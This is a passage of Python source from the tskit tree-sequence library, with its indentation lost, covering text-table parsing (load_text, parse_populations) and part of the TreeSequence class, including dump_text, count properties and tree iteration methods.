metadata_index = None
try:
metadata_index = header.index("metadata")
except ValueError:
pass
for line in source:
tokens = line.split(sep)
if len(tokens) >= 3:
site = int(tokens[site_index])
node = int(tokens[node_index])
if time_index is None or tokens[time_index] == "unknown":
time = UNKNOWN_TIME
else:
time = float(tokens[time_index])
derived_state = tokens[derived_state_index]
if parent_index is not None:
parent = int(tokens[parent_index])
metadata = b""
if metadata_index is not None and metadata_index < len(tokens):
metadata = tokens[metadata_index].encode(encoding)
if base64_metadata:
metadata = base64.b64decode(metadata)
table.add_row(
site=site,
node=node,
time=time,
derived_state=derived_state,
parent=parent,
metadata=metadata,
)
return table
def parse_populations(
source, strict=True, encoding="utf8", base64_metadata=True, table=None
):
"""
Parse the specified file-like object containing a whitespace delimited
description of a population table and returns the corresponding
:class:`PopulationTable` instance. See the :ref:`population text format
<sec_population_text_format>` section for the details of the required
format and the :ref:`population table definition
<sec_population_table_definition>` section for the required properties of
the contents.
See :func:`tskit.load_text` for a detailed explanation of the ``strict``
parameter.
:param io.TextIOBase source: The file-like object containing the text.
:param bool strict: If True, require strict tab delimiting (default). If
False, a relaxed whitespace splitting algorithm is used.
:param str encoding: Encoding used for text representation.
:param bool base64_metadata: If True, metadata is encoded using Base64
encoding; otherwise, as plain text.
:param PopulationTable table: If specified write into this table. If not,
create a new :class:`PopulationTable` instance.
"""
sep = None
if strict:
sep = "\t"
if table is None:
table = tables.PopulationTable()
# Read the header and find the indexes of the required fields.
header = source.readline().strip("\n").split(sep)
metadata_index = header.index("metadata")
for line in source:
tokens = line.split(sep)
if len(tokens) >= 1:
metadata = tokens[metadata_index].encode(encoding)
if base64_metadata:
metadata = base64.b64decode(metadata)
table.add_row(metadata=metadata)
return table
def load_text(
nodes,
edges,
sites=None,
mutations=None,
individuals=None,
populations=None,
sequence_length=0,
strict=True,
encoding="utf8",
base64_metadata=True,
):
"""
Parses the tree sequence data from the specified file-like objects, and
returns the resulting :class:`TreeSequence` object. The format
for these files is documented in the :ref:`sec_text_file_format` section,
and is produced by the :meth:`TreeSequence.dump_text` method. Further
properties required for an input tree sequence are described in the
:ref:`sec_valid_tree_sequence_requirements` section. This method is intended as a
convenient interface for importing external data into tskit; the binary
file format using by :meth:`tskit.load` is many times more efficient than
this text format.
The ``nodes`` and ``edges`` parameters are mandatory and must be file-like
objects containing text with whitespace delimited columns, parsable by
:func:`parse_nodes` and :func:`parse_edges`, respectively. ``sites``,
``mutations``, ``individuals`` and ``populations`` are optional, and must
be parsable by :func:`parse_sites`, :func:`parse_individuals`,
:func:`parse_populations`, and :func:`parse_mutations`, respectively.
The ``sequence_length`` parameter determines the
:attr:`TreeSequence.sequence_length` of the returned tree sequence. If it
is 0 or not specified, the value is taken to be the maximum right
coordinate of the input edges. This parameter is useful in degenerate
situations (such as when there are zero edges), but can usually be ignored.
The ``strict`` parameter controls the field delimiting algorithm that
is used. If ``strict`` is True (the default), we require exactly one
tab character separating each field. If ``strict`` is False, a more relaxed
whitespace delimiting algorithm is used, such that any run of whitespace
is regarded as a field separator. In most situations, ``strict=False``
is more convenient, but it can lead to error in certain situations. For
example, if a deletion is encoded in the mutation table this will not
be parseable when ``strict=False``.
After parsing the tables, :meth:`TableCollection.sort` is called to ensure that
the loaded tables satisfy the tree sequence :ref:`ordering requirements
<sec_valid_tree_sequence_requirements>`. Note that this may result in the
IDs of various entities changing from their positions in the input file.
:param io.TextIOBase nodes: The file-like object containing text describing a
:class:`NodeTable`.
:param io.TextIOBase edges: The file-like object containing text
describing an :class:`EdgeTable`.
:param io.TextIOBase sites: The file-like object containing text describing a
:class:`SiteTable`.
:param io.TextIOBase mutations: The file-like object containing text
describing a :class:`MutationTable`.
:param io.TextIOBase individuals: The file-like object containing text
describing a :class:`IndividualTable`.
:param io.TextIOBase populations: The file-like object containing text
describing a :class:`PopulationTable`.
:param float sequence_length: The sequence length of the returned tree sequence. If
not supplied or zero this will be inferred from the set of edges.
:param bool strict: If True, require strict tab delimiting (default). If
False, a relaxed whitespace splitting algorithm is used.
:param str encoding: Encoding used for text representation.
:param bool base64_metadata: If True, metadata is encoded using Base64
encoding; otherwise, as plain text.
:return: The tree sequence object containing the information
stored in the specified file paths.
:rtype: :class:`tskit.TreeSequence`
"""
# We need to parse the edges so we can figure out the sequence length, and
# TableCollection.sequence_length is immutable so we need to create a temporary
# edge table.
edge_table = parse_edges(edges, strict=strict)
if sequence_length == 0 and len(edge_table) > 0:
sequence_length = edge_table.right.max()
tc = tables.TableCollection(sequence_length)
tc.edges.set_columns(
left=edge_table.left,
right=edge_table.right,
parent=edge_table.parent,
child=edge_table.child,
)
parse_nodes(
nodes,
strict=strict,
encoding=encoding,
base64_metadata=base64_metadata,
table=tc.nodes,
)
# We need to add populations any referenced in the node table.
if len(tc.nodes) > 0:
max_population = tc.nodes.population.max()
if max_population != NULL:
for _ in range(max_population + 1):
tc.populations.add_row()
if sites is not None:
parse_sites(
sites,
strict=strict,
encoding=encoding,
base64_metadata=base64_metadata,
table=tc.sites,
)
if mutations is not None:
parse_mutations(
mutations,
strict=strict,
encoding=encoding,
base64_metadata=base64_metadata,
table=tc.mutations,
)
if individuals is not None:
parse_individuals(
individuals,
strict=strict,
encoding=encoding,
base64_metadata=base64_metadata,
table=tc.individuals,
)
if populations is not None:
parse_populations(
populations,
strict=strict,
encoding=encoding,
base64_metadata=base64_metadata,
table=tc.populations,
)
tc.sort()
return tc.tree_sequence()
class TreeIterator:
"""
Simple class providing forward and backward iteration over a tree sequence.
"""
def __init__(self, tree):
self.tree = tree
self.more_trees = True
self.forward = True
def __iter__(self):
return self
def __reversed__(self):
self.forward = False
return self
def __next__(self):
if self.forward:
self.more_trees = self.more_trees and self.tree.next()
else:
self.more_trees = self.more_trees and self.tree.prev()
if not self.more_trees:
raise StopIteration()
return self.tree
def __len__(self):
return self.tree.tree_sequence.num_trees
class SimpleContainerSequence:
"""
Simple wrapper to allow arrays of SimpleContainers (e.g. edges, nodes) that have a
function allowing access by index (e.g. ts.edge(i), ts.node(i)) to be treated as a
python sequence, allowing forward and reverse iteration.
"""
def __init__(self, getter, length):
self.getter = getter
self.length = length
def __len__(self):
return self.length
def __getitem__(self, index):
if index < 0:
index += len(self)
if index < 0 or index >= len(self):
raise IndexError("Index out of bounds")
return self.getter(index)
class TreeSequence:
"""
A single tree sequence, as defined by the :ref:`data model <sec_data_model>`.
A TreeSequence instance can be created from a set of
:ref:`tables <sec_table_definitions>` using
:meth:`TableCollection.tree_sequence`, or loaded from a set of text files
using :func:`tskit.load_text`, or loaded from a native binary file using
:func:`tskit.load`.
TreeSequences are immutable. To change the data held in a particular
tree sequence, first get the table information as a :class:`TableCollection`
instance (using :meth:`.dump_tables`), edit those tables using the
:ref:`tables api <sec_tables_api>`, and create a new tree sequence using
:meth:`TableCollection.tree_sequence`.
The :meth:`.trees` method iterates over all trees in a tree sequence, and
the :meth:`.variants` method iterates over all sites and their genotypes.
"""
@dataclass(frozen=True)
class _TableMetadataSchemas:
"""
Convenience class for returning schemas
"""
node: metadata_module.MetadataSchema = None
edge: metadata_module.MetadataSchema = None
site: metadata_module.MetadataSchema = None
mutation: metadata_module.MetadataSchema = None
migration: metadata_module.MetadataSchema = None
individual: metadata_module.MetadataSchema = None
population: metadata_module.MetadataSchema = None
def __init__(self, ll_tree_sequence):
self._ll_tree_sequence = ll_tree_sequence
metadata_schema_strings = self._ll_tree_sequence.get_table_metadata_schemas()
metadata_schema_instances = {
name: metadata_module.parse_metadata_schema(
getattr(metadata_schema_strings, name)
)
for name in vars(self._TableMetadataSchemas)
if not name.startswith("_")
}
self._table_metadata_schemas = self._TableMetadataSchemas(
**metadata_schema_instances
)
# Implement the pickle protocol for TreeSequence
def __getstate__(self):
return self.dump_tables()
def __setstate__(self, tc):
self.__init__(tc.tree_sequence().ll_tree_sequence)
def __eq__(self, other):
return self.tables == other.tables
def equals(
self,
other,
*,
ignore_metadata=False,
ignore_ts_metadata=False,
ignore_provenance=False,
ignore_timestamps=False,
):
"""
Returns True if `self` and `other` are equal. Uses the underlying table equlity,
see :meth:`TableCollection.equals` for details and options.
"""
return self.tables.equals(
other.tables,
ignore_metadata=ignore_metadata,
ignore_ts_metadata=ignore_ts_metadata,
ignore_provenance=ignore_provenance,
ignore_timestamps=ignore_timestamps,
)
@property
def ll_tree_sequence(self):
return self.get_ll_tree_sequence()
def get_ll_tree_sequence(self):
return self._ll_tree_sequence
def aslist(self, **kwargs):
"""
Returns the trees in this tree sequence as a list. Each tree is
represented by a different instance of :class:`Tree`. As such, this
method is inefficient and may use a large amount of memory, and should
not be used when performance is a consideration. The :meth:`.trees`
method is the recommended way to efficiently iterate over the trees
in a tree sequence.
:param \\**kwargs: Further arguments used as parameters when constructing the
returned trees. For example ``ts.aslist(sample_lists=True)`` will result
in a list of :class:`Tree` instances created with ``sample_lists=True``.
:return: A list of the trees in this tree sequence.
:rtype: list
"""
return [tree.copy() for tree in self.trees(**kwargs)]
@classmethod
def load(cls, file_or_path):
file, local_file = util.convert_file_like_to_open_file(file_or_path, "rb")
try:
ts = _tskit.TreeSequence()
ts.load(file)
return TreeSequence(ts)
except exceptions.FileFormatError as e:
# TODO Fix this for new file semantics
formats.raise_hdf5_format_error(file_or_path, e)
finally:
if local_file:
file.close()
@classmethod
def load_tables(cls, tables, *, build_indexes=False):
ts = _tskit.TreeSequence()
ts.load_tables(tables._ll_tables, build_indexes=build_indexes)
return TreeSequence(ts)
def dump(self, file_or_path, zlib_compression=False):
"""
Writes the tree sequence to the specified path or file object.
:param str file_or_path: The file object or path to write the TreeSequence to.
:param bool zlib_compression: This parameter is deprecated and ignored.
"""
if zlib_compression:
# Note: the msprime CLI before version 1.0 uses this option, so we need
# to keep it indefinitely.
warnings.warn(
"The zlib_compression option is no longer supported and is ignored",
RuntimeWarning,
)
file, local_file = util.convert_file_like_to_open_file(file_or_path, "wb")
try:
self._ll_tree_sequence.dump(file)
finally:
if local_file:
file.close()
@property
def tables_dict(self):
"""
Returns a dictionary mapping names to tables in the
underlying :class:`.TableCollection`. Equivalent to calling
``ts.tables.name_map``.
"""
return self.tables.name_map
@property
def tables(self):
"""
A copy of the tables underlying this tree sequence. See also
:meth:`.dump_tables`.
.. warning:: This propery currently returns a copy of the tables
underlying a tree sequence but it may return a read-only
**view** in the future. Thus, if the tables will subsequently be
updated, please use the :meth:`.dump_tables` method instead as
this will always return a new copy of the TableCollection.
:return: A :class:`TableCollection` containing all a copy of the
tables underlying this tree sequence.
:rtype: TableCollection
"""
return self.dump_tables()
@property
def nbytes(self):
"""
Returns the total number of bytes required to store the data
in this tree sequence. Note that this may not be equal to
the actual memory footprint.
"""
return self.tables.nbytes
def dump_tables(self):
"""
A copy of the tables defining this tree sequence.
:return: A :class:`TableCollection` containing all tables underlying
the tree sequence.
:rtype: TableCollection
"""
t = tables.TableCollection(sequence_length=self.sequence_length)
self._ll_tree_sequence.dump_tables(t._ll_tables)
return t
def dump_text(
self,
nodes=None,
edges=None,
sites=None,
mutations=None,
individuals=None,
populations=None,
provenances=None,
precision=6,
encoding="utf8",
base64_metadata=True,
):
"""
Writes a text representation of the tables underlying the tree sequence
to the specified connections.
If Base64 encoding is not used, then metadata will be saved directly, possibly
resulting in errors reading the tables back in if metadata includes whitespace.
:param io.TextIOBase nodes: The file-like object (having a .write() method) to
write the NodeTable to.
:param io.TextIOBase edges: The file-like object to write the EdgeTable to.
:param io.TextIOBase sites: The file-like object to write the SiteTable to.
:param io.TextIOBase mutations: The file-like object to write the
MutationTable to.
:param io.TextIOBase individuals: The file-like object to write the
IndividualTable to.
:param io.TextIOBase populations: The file-like object to write the
PopulationTable to.
:param io.TextIOBase provenances: The file-like object to write the
ProvenanceTable to.
:param int precision: The number of digits of precision.
:param str encoding: Encoding used for text representation.
:param bool base64_metadata: If True, metadata is encoded using Base64
encoding; otherwise, as plain text.
"""
if nodes is not None:
print(
"id",
"is_sample",
"time",
"population",
"individual",
"metadata",
sep="\t",
file=nodes,
)
for node in self.nodes():
metadata = node.metadata
if base64_metadata:
metadata = base64.b64encode(metadata).decode(encoding)
row = (
"{id:d}\t"
"{is_sample:d}\t"
"{time:.{precision}f}\t"
"{population:d}\t"
"{individual:d}\t"
"{metadata}"
).format(
precision=precision,
id=node.id,
is_sample=node.is_sample(),
time=node.time,
population=node.population,
individual=node.individual,
metadata=metadata,
)
print(row, file=nodes)
if edges is not None:
print("left", "right", "parent", "child", sep="\t", file=edges)
for edge in self.edges():
row = (
"{left:.{precision}f}\t"
"{right:.{precision}f}\t"
"{parent:d}\t"
"{child:d}"
).format(
precision=precision,
left=edge.left,
right=edge.right,
parent=edge.parent,
child=edge.child,
)
print(row, file=edges)
if sites is not None:
print("position", "ancestral_state", "metadata", sep="\t", file=sites)
for site in self.sites():
metadata = site.metadata
if base64_metadata:
metadata = base64.b64encode(metadata).decode(encoding)
row = (
"{position:.{precision}f}\t" "{ancestral_state}\t" "{metadata}"
).format(
precision=precision,
position=site.position,
ancestral_state=site.ancestral_state,
metadata=metadata,
)
print(row, file=sites)
if mutations is not None:
print(
"site",
"node",
"time",
"derived_state",
"parent",
"metadata",
sep="\t",
file=mutations,
)
for site in self.sites():
for mutation in site.mutations:
metadata = mutation.metadata
if base64_metadata:
metadata = base64.b64encode(metadata).decode(encoding)
row = (
"{site}\t"
"{node}\t"
"{time}\t"
"{derived_state}\t"
"{parent}\t"
"{metadata}"
).format(
site=mutation.site,
node=mutation.node,
time="unknown"
if util.is_unknown_time(mutation.time)
else mutation.time,
derived_state=mutation.derived_state,
parent=mutation.parent,
metadata=metadata,
)
print(row, file=mutations)
if individuals is not None:
print("id", "flags", "location", "metadata", sep="\t", file=individuals)
for individual in self.individuals():
metadata = individual.metadata
if base64_metadata:
metadata = base64.b64encode(metadata).decode(encoding)
location = ",".join(map(str, individual.location))
row = ("{id}\t" "{flags}\t" "{location}\t" "{metadata}").format(
id=individual.id,
flags=individual.flags,
location=location,
metadata=metadata,
)
print(row, file=individuals)
if populations is not None:
print("id", "metadata", sep="\t", file=populations)
for population in self.populations():
metadata = population.metadata
if base64_metadata:
metadata = base64.b64encode(metadata).decode(encoding)
row = ("{id}\t" "{metadata}").format(
id=population.id, metadata=metadata
)
print(row, file=populations)
if provenances is not None:
print("id", "timestamp", "record", sep="\t", file=provenances)
for provenance in self.provenances():
row = ("{id}\t" "{timestamp}\t" "{record}\t").format(
id=provenance.id,
timestamp=provenance.timestamp,
record=provenance.record,
)
print(row, file=provenances)
def __str__(self):
ts_rows = [
["Trees", str(self.num_trees)],
["Sequence Length", str(self.sequence_length)],
["Sample Nodes", str(self.num_samples)],
["Total Size", util.naturalsize(self.nbytes)],
]
header = ["Table", "Rows", "Size", "Has Metadata"]
table_rows = []
for name, table in self.tables.name_map.items():
table_rows.append(
[
str(s)
for s in [
name.capitalize(),
table.num_rows,
util.naturalsize(table.nbytes),
"Yes"
if hasattr(table, "metadata") and len(table.metadata) > 0
else "No",
]
]
)
return util.unicode_table(ts_rows, title="TreeSequence") + util.unicode_table(
table_rows, header=header
)
def _repr_html_(self):
"""
Called by jupyter notebooks to render a TreeSequence
"""
return util.tree_sequence_html(self)
# num_samples was originally called sample_size, and so we must keep sample_size
# around as a deprecated alias.
@property
def num_samples(self):
"""
Returns the number of samples in this tree sequence. This is the number
of sample nodes in each tree.
:return: The number of sample nodes in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_samples()
@property
def table_metadata_schemas(self) -> "_TableMetadataSchemas":
"""
The set of metadata schemas for the tables in this tree sequence.
"""
return self._table_metadata_schemas
@property
def sample_size(self):
# Deprecated alias for num_samples
return self.num_samples
def get_sample_size(self):
# Deprecated alias for num_samples
return self.num_samples
@property
def file_uuid(self):
return self._ll_tree_sequence.get_file_uuid()
@property
def sequence_length(self):
"""
Returns the sequence length in this tree sequence. This defines the
genomic scale over which tree coordinates are defined. Given a
tree sequence with a sequence length :math:`L`, the constituent
trees will be defined over the half-closed interval
:math:`[0, L)`. Each tree then covers some subset of this
interval --- see :attr:`tskit.Tree.interval` for details.
:return: The length of the sequence in this tree sequence in bases.
:rtype: float
"""
return self.get_sequence_length()
def get_sequence_length(self):
return self._ll_tree_sequence.get_sequence_length()
@property
def metadata(self) -> Any:
"""
The decoded metadata for this TreeSequence.
"""
return self.metadata_schema.decode_row(self._ll_tree_sequence.get_metadata())
@property
def metadata_schema(self) -> metadata_module.MetadataSchema:
"""
The :class:`tskit.MetadataSchema` for this TreeSequence.
"""
return metadata_module.parse_metadata_schema(
self._ll_tree_sequence.get_metadata_schema()
)
@property
def num_edges(self):
"""
Returns the number of :ref:`edges <sec_edge_table_definition>` in this
tree sequence.
:return: The number of edges in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_edges()
def get_num_trees(self):
# Deprecated alias for self.num_trees
return self.num_trees
@property
def num_trees(self):
"""
Returns the number of distinct trees in this tree sequence. This
is equal to the number of trees returned by the :meth:`.trees`
method.
:return: The number of trees in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_trees()
def get_num_sites(self):
# Deprecated alias for self.num_sites
return self._ll_tree_sequence.get_num_sites()
@property
def num_sites(self):
"""
Returns the number of :ref:`sites <sec_site_table_definition>` in
this tree sequence.
:return: The number of sites in this tree sequence.
:rtype: int
"""
return self.get_num_sites()
def get_num_mutations(self):
# Deprecated alias for self.num_mutations
return self.num_mutations
@property
def num_mutations(self):
"""
Returns the number of :ref:`mutations <sec_mutation_table_definition>`
in this tree sequence.
:return: The number of mutations in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_mutations()
def get_num_nodes(self):
# Deprecated alias for self.num_nodes
return self.num_nodes
@property
def num_individuals(self):
"""
Returns the number of :ref:`individuals <sec_individual_table_definition>` in
this tree sequence.
:return: The number of individuals in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_individuals()
@property
def num_nodes(self):
"""
Returns the number of :ref:`nodes <sec_node_table_definition>` in
this tree sequence.
:return: The number of nodes in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_nodes()
@property
def num_provenances(self):
"""
Returns the number of :ref:`provenances <sec_provenance_table_definition>`
in this tree sequence.
:return: The number of provenances in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_provenances()
@property
def num_populations(self):
"""
Returns the number of :ref:`populations <sec_population_table_definition>`
in this tree sequence.
:return: The number of populations in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_populations()
@property
def num_migrations(self):
"""
Returns the number of :ref:`migrations <sec_migration_table_definition>`
in this tree sequence.
:return: The number of migrations in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_migrations()
@property
def max_root_time(self):
"""
Returns the time of the oldest root in any of the trees in this tree sequence.
This is usually equal to ``np.max(ts.tables.nodes.time)`` but may not be
since there can be non-sample nodes that are not present in any tree. Note that
isolated samples are also defined as roots (so there can be a max_root_time
even in a tree sequence with no edges).
:return: The maximum time of a root in this tree sequence.
:rtype: float
:raises ValueError: If there are no samples in the tree, and hence no roots (as
roots are defined by the ends of the upward paths from the set of samples).
"""
if self.num_samples == 0:
raise ValueError(
"max_root_time is not defined in a tree sequence with 0 samples"
)
ret = max(self.node(u).time for u in self.samples())
if self.num_edges > 0:
# Edges are guaranteed to be listed in parent-time order, so we can get the
# last one to get the oldest root
edge = self.edge(self.num_edges - 1)
# However, we can have situations where there is a sample older than a
# 'proper' root
ret = max(ret, self.node(edge.parent).time)
return ret
def migrations(self):
"""
Returns an iterable sequence of all the
:ref:`migrations <sec_migration_table_definition>` in this tree sequence.
Migrations are returned in nondecreasing order of the ``time`` value.
:return: An iterable sequence of all migrations.
:rtype: Sequence(:class:`.Migration`)
"""
return SimpleContainerSequence(self.migration, self.num_migrations)
def individuals(self):
"""
Returns an iterable sequence of all the
:ref:`individuals <sec_individual_table_definition>` in this tree sequence.
:return: An iterable sequence of all individuals.
:rtype: Sequence(:class:`.Individual`)
"""
return SimpleContainerSequence(self.individual, self.num_individuals)
def nodes(self):
"""
Returns an iterable sequence of all the :ref:`nodes <sec_node_table_definition>`
in this tree sequence.
:return: An iterable sequence of all nodes.
:rtype: Sequence(:class:`.Node`)
"""
return SimpleContainerSequence(self.node, self.num_nodes)
def edges(self):
"""
Returns an iterable sequence of all the :ref:`edges <sec_edge_table_definition>`
in this tree sequence. Edges are returned in the order required
for a :ref:`valid tree sequence <sec_valid_tree_sequence_requirements>`. So,
edges are guaranteed to be ordered such that (a) all parents with a
given ID are contiguous; (b) edges are returned in non-descreasing
order of parent time ago; (c) within the edges for a given parent, edges
are sorted first by child ID and then by left coordinate.
:return: An iterable sequence of all edges.
:rtype: Sequence(:class:`.Edge`)
"""
return SimpleContainerSequence(self.edge, self.num_edges)
def edgesets(self):
# TODO the order that these records are returned in is not well specified.
# Hopefully this does not matter, and we can just state that the ordering
# should not be depended on.
children = collections.defaultdict(set)
active_edgesets = {}
for (left, right), edges_out, edges_in in self.edge_diffs():
# Complete and return any edgesets that are affected by this tree
# transition
parents = iter(edge.parent for edge in itertools.chain(edges_out, edges_in))
for parent in parents:
if parent in active_edgesets:
edgeset = active_edgesets.pop(parent)
edgeset.right = left
edgeset.children = sorted(children[parent])
yield edgeset
for edge in edges_out:
children[edge.parent].remove(edge.child)
for edge in edges_in:
children[edge.parent].add(edge.child)
# Update the active edgesets
for edge in itertools.chain(edges_out, edges_in):
if (
len(children[edge.parent]) > 0
and edge.parent not in active_edgesets
):
active_edgesets[edge.parent] = Edgeset(left, right, edge.parent, [])
for parent in active_edgesets.keys():
edgeset = active_edgesets[parent]
edgeset.right = self.sequence_length
edgeset.children = sorted(children[edgeset.parent])
yield edgeset
def edge_diffs(self, include_terminal=False):
"""
Returns an iterator over all the edges that are inserted and removed to
build the trees as we move from left-to-right along the tree sequence.
Each iteration yields a named tuple consisting of 3 values,
``(interval, edges_out, edges_in)``. The first value, ``interval``, is the
genomic interval ``(left, right)`` covered by the incoming tree
(see :attr:`Tree.interval`). The second, ``edges_out`` is a list of the edges
that were just-removed to create the tree covering the interval
(hence ``edges_out`` will always be empty for the first tree). The last value,
``edges_in``, is a list of edges that were just
inserted to construct the tree covering the current interval.
The edges returned within each ``edges_in`` list are ordered by ascending
time of the parent node, then ascending parent id, then ascending child id.
The edges within each ``edges_out`` list are the reverse order (e.g.
descending parent time, parent id, then child_id). This means that within
each list, edges with the same parent appear consecutively.
:param bool include_terminal: If False (default), the iterator terminates
after the final interval in the tree sequence (i.e. it does not
report a final removal of all remaining edges), and the number
of iterations will be equal to the number of trees in the tree
sequence. If True, an additional iteration takes place, with the last
``edges_out`` value reporting all the edges contained in the final
tree (with both ``left`` and ``right`` equal to the sequence length).
:return: An iterator over the (interval, edges_out, edges_in) tuples. This
is a named tuple, so the 3 values can be accessed by position
(e.g. ``returned_tuple[0]``) or name (e.g. ``returned_tuple.interval``).
:rtype: :class:`collections.abc.Iterable`
"""
iterator = _tskit.TreeDiffIterator(self._ll_tree_sequence, include_terminal)
metadata_decoder = self.table_metadata_schemas.edge.decode_row
for interval, edge_tuples_out, edge_tuples_in in iterator:
edges_out = [
Edge(*e, metadata_decoder=metadata_decoder) for e in edge_tuples_out
]
edges_in = [
Edge(*e, metadata_decoder=metadata_decoder) for e in edge_tuples_in
]
yield EdgeDiff(Interval(*interval), edges_out, edges_in)
def sites(self):
"""
Returns an iterable sequence of all the :ref:`sites <sec_site_table_definition>`
in this tree sequence. Sites are returned in order of increasing ID
(and also position). See the :class:`Site` class for details on
the available fields for each site.
:return: An iterable sequence of all sites.
:rtype: Sequence(:class:`.Site`)
"""
return SimpleContainerSequence(self.site, self.num_sites)
def mutations(self):
"""
Returns an iterator over all the
:ref:`mutations <sec_mutation_table_definition>` in this tree sequence.
Mutations are returned in order of nondecreasing site ID.
See the :class:`Mutation` class for details on the available fields for
each mutation.
The returned iterator is equivalent to iterating over all sites
and all mutations in each site, i.e.::
>>> for site in tree_sequence.sites():
>>> for mutation in site.mutations:
>>> yield mutation
:return: An iterator over all mutations in this tree sequence.
:rtype: iter(:class:`Mutation`)
"""
for site in self.sites():
yield from site.mutations
def populations(self):
"""
Returns an iterable sequence of all the
:ref:`populations <sec_population_table_definition>` in this tree sequence.
:return: An iterable sequence of all populations.
:rtype: Sequence(:class:`.Population`)
"""
return SimpleContainerSequence(self.population, self.num_populations)
def provenances(self):
"""
Returns an iterable sequence of all the
:ref:`provenances <sec_provenance_table_definition>` in this tree sequence.
:return: An iterable sequence of all provenances.
:rtype: Sequence(:class:`.Provenance`)
"""
return SimpleContainerSequence(self.provenance, self.num_provenances)
def breakpoints(self, as_array=False):
"""
Returns the breakpoints along the chromosome, including the two extreme points
0 and L. This is equivalent to
>>> iter([0] + [t.interval.right for t in self.trees()])
By default we return an iterator over the breakpoints as Python float objects;
if ``as_array`` is True we return them as a numpy array.
Note that the ``as_array`` form will be more efficient and convenient in most
cases; the default iterator behaviour is mainly kept to ensure compatability
with existing code.
:param bool as_array: If True, return the breakpoints as a numpy array.
:return: The breakpoints defined by the tree intervals along the sequence.
:rtype: collections.abc.Iterable or numpy.ndarray
"""
breakpoints = self.ll_tree_sequence.get_breakpoints()
if not as_array:
# Convert to Python floats for backward compatibility.
breakpoints = map(float, breakpoints)
return breakpoints
def at(self, position, **kwargs):
"""
Returns the tree covering the specified genomic location. The returned tree
will have ``tree.interval.left`` <= ``position`` < ``tree.interval.right``.
See also :meth:`Tree.seek`.
:param float position: A genomic location.
:param \\**kwargs: Further arguments used as parameters when constructing the
returned :class:`Tree`. For example ``ts.at(2.5, sample_lists=True)`` will
result in a :class:`Tree` created with ``sample_lists=True``.
:return: A new instance of :class:`Tree` positioned to cover the specified
genomic location.
:rtype: Tree
"""
tree = Tree(self, **kwargs)
tree.seek(position)
return tree
def at_index(self, index, **kwargs):
"""
Returns the tree at the specified index. See also :meth:`Tree.seek_index`.
:param int index: The index of the required tree.
:param \\**kwargs: Further arguments used as parameters when constructing the
returned :class:`Tree`. For example ``ts.at_index(4, sample_lists=True)``
will result in a :class:`Tree` created with ``sample_lists=True``.
:return: A new instance of :class:`Tree` positioned at the specified index.
:rtype: Tree
"""
tree = Tree(self, **kwargs)
tree.seek_index(index)
return tree
def first(self, **kwargs):
"""
Returns the first tree in this :class:`TreeSequence`. To iterate over all
trees in the sequence, use the :meth:`.trees` method.
:param \\**kwargs: Further arguments used as parameters when constructing the
returned :class:`Tree`. For example ``ts.first(sample_lists=True)`` will
result in a :class:`Tree` created with ``sample_lists=True``.
:return: The first tree in this tree sequence.
:rtype: :class:`Tree`.
"""
tree = Tree(self, **kwargs)
tree.first()
return tree
def last(self, **kwargs):
"""
Returns the last tree in this :class:`TreeSequence`. To iterate over all
trees in the sequence, use the :meth:`.trees` method.
:param \\**kwargs: Further arguments used as parameters when constructing the
returned :class:`Tree`. For example ``ts.first(sample_lists=True)`` will
result in a :class:`Tree` created with ``sample_lists=True``.
:return: The last tree in this tree sequence.
:rtype: :class:`Tree`.
"""
tree = Tree(self, **kwargs)
tree.last()
return tree
def trees(
self,
tracked_samples=None,
*,
sample_lists=False,
root_threshold=1,
sample_counts=None,
tracked_leaves=None,
leaf_counts=None,
leaf_lists=None,
):
"""
Returns an iterator over the trees in this tree sequence. Each value
returned in this iterator is an instance of :class:`Tree`. Upon
successful termination of the iterator, the tree will be in the
"cleared" null state.
The ``sample_lists`` and ``tracked_samples`` parameters are passed
to the :class:`Tree` constructor, and control
the options that are set in the returned tree instance.
:warning: Do not store the results of this iterator in a list!
For performance reasons, the same underlying object is used
for every tree returned which will most likely lead to unexpected
behaviour. If you wish to obtain a list of trees in a tree sequence
please use ``ts.aslist()`` instead.
:param list tracked_samples: The list of samples to be tracked and
counted using the :meth:`Tree.num_tracked_samples` method.
:param bool sample_lists: If True, provide more efficient access
to the samples beneath a give node using the
:meth:`Tree.samples` method.
:param int root_threshold: The minimum number of samples that a node
must be ancestral to for it to be in the list of roots. By default
this is 1, so that isolated samples (representing missing data)
are roots. To efficiently restrict the roots of the tree to
those subtending meaningful topology, set this to 2. This value
is only relevant when trees have multiple roots.
:param bool sample_counts: Deprecated since 0.2.4.
:return: An iterator over the Trees in this tree sequence.
:rtype: collections.abc.Iterable, :class:`Tree`
"""
# tracked_leaves, leaf_counts and leaf_lists are deprecated aliases
# for tracked_samples, sample_counts and sample_lists respectively.
# These are left over from an older version of the API when leaves
# and samples were synonymous.
if tracked_leaves is not None:
tracked_samples = tracked_leaves
if leaf_counts is not None:
sample_counts = leaf_counts
if leaf_lists is not None:
sample_lists = leaf_lists
tree = Tree(
self,
tracked_samples=tracked_samples,
sample_lists=sample_lists,
root_threshold=root_threshold,
sample_counts=sample_counts,
)
return TreeIterator(tree)
def coiterate(self, other, **kwargs):
"""
Returns an iterator over the pairs of trees for each distinct
interval in the specified pair of tree sequences.
:param TreeSequence other: The other tree sequence from which to take trees. The
sequence length must be the same as the current tree sequence.
:param \\**kwargs: Further named arguments that will be passed to the
:meth:`.trees` method when constructing the returned trees.
:return: An iterator returning successive tuples of the form
``(interval, tree_self, tree_other)``. For example, the first item returned
will consist of an tuple of the initial interval, the first tree of the
current tree sequence, and the first tree of the ``other`` tree sequence;
the ``.left`` attribute of the initial interval will be 0 and the ``.right``
attribute will be the smallest non-zero breakpoint of the 2 tree sequences.
:rtype: iter(:class:`Interval`, :class:`Tree`, :class:`Tree`)
"""
if self.sequence_length != other.sequence_length:
raise ValueError("Tree sequences must be of equal sequence length.")
L = self.sequence_length
trees1 = self.trees(**kwargs)
trees2 = other.trees(**kwargs)
tree1 = next(trees1)
tree2 = next(trees2)
right = 0
while right != L:
left = right
right = min(tree1.interval.right, tree2.interval.right)
